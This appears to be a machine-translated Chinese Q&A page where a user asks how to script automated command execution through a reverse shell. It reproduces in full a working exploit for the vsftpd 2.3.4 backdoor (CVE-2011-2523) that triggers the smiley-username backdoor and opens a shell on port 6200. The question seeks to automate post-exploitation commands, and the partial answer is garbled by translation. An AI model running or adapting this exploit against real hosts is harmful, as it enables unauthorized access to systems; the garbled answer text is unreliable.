Python中文网 - 问答频道, 解决您学习工作中的Python难题和Bug
Python常见问题
我想“自动化”一个脚本给出的反向shell。让我解释一下:
Contexte:易受攻击的计算机上存在后门
我在做什么:我创建了一个subprocess,它执行一个脚本(python、perl等等),并给我一个反向shell
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stderr=PIPE).communicate()
我想做什么:在运行脚本的同时<=&燃气轮机;运行我的反向shell,我希望能够使用方法与之交互
今天,我能够在我的反向shell的终端中手动编写:我用Popen调用的脚本运行并使用后门。这给了我一个反向shell,我可以键入我的命令
明天,我希望能够在这个反向shell的执行过程中调用方法:我使用Popen运行一个脚本,它利用后门并给我一个shell。我不希望手动输入命令,而是希望自动地将一系列命令发送到这个反向shell,并且对于每一个命令,我都能够恢复返回的数据
理想情况下,我想要这样的东西:
backdoor.execute() //This method allow me to get a reverse shell
backdoor.send("whoami") //This method allow me to send a command to the reverse shell and to get the result
.
.
backdoor.finish() //This method allow to close the reverse shell
我试图做的事情没有成功:我尝试使用subprocess模块的Popen类重定向脚本的输入和/或输出
Popen(["python", /opt/exploits/backdoor.py, remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate()
然而,当尝试重定向这两个流(或者只是其中一个流)时,我的反向shell关闭的速度与打开的速度一样快
我还尝试将命令直接放在communicate()方法上:
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami")
我尝试了这个方法,有输入和/或输出重定向,也没有重定向,但没有任何效果
最后,我尝试使用pexpect模块运行我的脚本以获得一个反向shell,但我没有任何结论(可能是我做错了)
PS:我无法更改允许我使用后门的脚本代码
后门.py
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523
#!/usr/bin/python3
from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit
def handler(signal_received, frame):
# Handle any cleanup here
print(' [+]Exiting...')
exit(0)
signal(SIGINT, handler)
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line
user="USER nergal:)"
password="PASS pass"
tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")
tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
Tags: theto方法py命令脚本hostshell
热门问题
- 从Django temp访问容器的方法
- 从Django temp请求ModelForm实例
- 从Django temp返回JSON
- 从Django timesince模板等效项中删除尾部数据
- 从Django timesin删除尾随数据
- 从Django UpdateView模板下载文件
- 从Django url传递“start”会出现错误“start()只接受2个参数(给定1个)”
- 从Django url运行的websockets错误:RuntimeError:线程“Dummy1”中没有当前事件循环
- 从Django user mod获取用户全名
- 从Django UserCreateForm中删除帮助文本
- 从Django values()获取外键值
- 从Django vi中的按钮获取click事件
- 从Django vi从HttpResponse检索JSON
- 从Django vi以json形式返回的数据中检索元素
- 从Django vi取消或取消eventlet中的芹菜任务
- 从Django vi启动多核后台进程
- 从Django vi开始
- 从Django Vi构建HTML
- 从Django vi访问进程数据
- 从Django vi调用pysnmp发送超时
热门文章
- Python覆盖写入文件
- 怎样创建一个 Python 列表?
- Python3 List append()方法使用
- 派森语言
- Python List pop()方法
- Python Django Web典型模块开发实战
- Python input() 函数
- Python3 列表(list) clear()方法
- Python游戏编程入门
- 如何创建一个空的set?
- python如何定义(创建)一个字符串
- Python标准库 [The Python Standard Library by Ex
- Python网络数据爬取及分析从入门到精通(分析篇)
- Python3 for 循环语句
- Python List insert() 方法
- Python 字典(Dictionary) update()方法
- Python编程无师自通 专业程序员的养成
- Python3 List count()方法
- Python 网络爬虫实战 [Web Crawler With Python]
- Python Cookbook(第2版)中文版
如果附加了
\n并且使用了-u(unbuffered)选项,那么这应该适用于单个命令。当然,为了获得命令输出,必须对返回值进行处理:只要
我们可以使用e发送命令(如果您不想在之后退出)。g
并得到不确定长度的结果
相关问题 更多 >
编程相关推荐